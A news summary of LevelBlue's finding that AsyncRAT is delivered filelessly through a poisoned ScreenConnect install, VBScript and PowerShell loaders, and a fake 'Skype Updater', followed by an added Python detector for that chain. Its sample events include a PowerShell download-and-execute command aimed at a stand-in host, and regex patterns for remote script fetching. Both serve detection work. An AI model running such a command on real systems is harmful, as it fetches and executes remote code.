Fileless malware: old tricks for new attacks
Briefly

"LevelBlue's SOC team has detected a fileless loader used to deploy AsyncRAT. AsyncRAT is one of the most popular examples of Malware-as-a-Service; attacks mainly target critical infrastructure in the US. It is a tool for remotely controlling devices. It disguises itself as a trusted utility and therefore regularly remains undetected. LevelBlue's most interesting discovery is not about the malware itself, but the way it ends up on devices."
"The legitimate RMM tool ScreenConnect was abused by the attackers in the incident highlighted by LevelBlue. The installation included the means to deploy AsyncRAT, but without separate files. After installing the poisoned version of ScreenConnect, a VBScript and PowerShell loader followed, which secretly ran components via external URLs. Only VBS files appeared on the disk, but the problematic consequences of this malware remained in RAM."
"Whenever a restart was needed for the malware, it was done via the malicious "Skype Updater," an app that is no longer used by Microsoft. Nevertheless, this background behavior is unlikely to be a sign that something is wrong for unsuspecting users."
Encrypted
"The secret reinstallation, the key to the long-term existence of this version of AsyncRAT, takes place via an encrypted string. During runtime, this is decrypted and the malware is told to reinstall itself if necessary."
AsyncRAT operates as a fileless Malware-as-a-Service tool used to remotely control devices and steal credentials and cryptocurrency wallets. LevelBlue's SOC observed a fileless loader that delivers AsyncRAT by abusing the legitimate RMM tool ScreenConnect. Attackers install a poisoned ScreenConnect build, then deploy VBScript and PowerShell loaders that execute components directly from external URLs, leaving only VBS files on disk while the payloads run in memory. Restarts are handled by a malicious "Skype Updater", and an encrypted string that is decrypted at runtime triggers reinstallation when needed. The malware hides its persistence data under the normally hidden %AppData% directory.
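Defender-side triage of the chain the summary describes, as an added example that is not from the LevelBlue or Techzine write-up: it runs a few constructed process-creation events through checks for the observables named above (a script host running a .vbs from the hidden AppData tree, the retired "Skype Updater" name, and PowerShell spawned by that host pulling code from a URL). The event field layout and the ScreenConnect client process name are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry):
# 1) the VBS loader started from a hidden AppData folder by the RMM client,
# 2) PowerShell, spawned by the script host, pulling a stage from a URL,
# 3) benign activity that must not fire.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Roaming\Skype Updater\update.vbs"',
     "parent": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage2')\"",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt",
     "parent": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# A .vbs path anywhere under the (normally hidden) AppData tree.
VBS_FROM_APPDATA = re.compile(r"\\AppData\\(?:Roaming|Local)\\.*\.vbs", re.IGNORECASE)
# PowerShell downloading and running code straight from a URL (nothing written to disk).
REMOTE_SCRIPT_FETCH = re.compile(
    r"(?:DownloadString|DownloadData|Invoke-WebRequest|iwr)\b.*https?://"
    r"|https?://.*\|\s*(?:iex|Invoke-Expression)", re.IGNORECASE)


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return the reasons this event matches the loader chain; an empty list means clean."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    reasons = []
    if image in SCRIPT_HOSTS and VBS_FROM_APPDATA.search(cmd):
        reasons.append("script host running .vbs from AppData")
    if image in SCRIPT_HOSTS and "screenconnect" in parent:  # assumed RMM process name
        reasons.append("script host spawned by the ScreenConnect client")
    if "skype updater" in cmd.lower():  # retired Microsoft name reused as a disguise
        reasons.append("reference to the retired 'Skype Updater' name")
    if image == "powershell.exe" and REMOTE_SCRIPT_FETCH.search(cmd):
        reasons.append("powershell fetching code from a URL")
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        reasons.append("powershell spawned by a VBScript host")
    return reasons


def scan(events):
    """Return (cmdline, reasons) for every event that matched at least one check."""
    return [(e["cmdline"], classify(e)) for e in events if classify(e)]
```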
Read at Techzine Global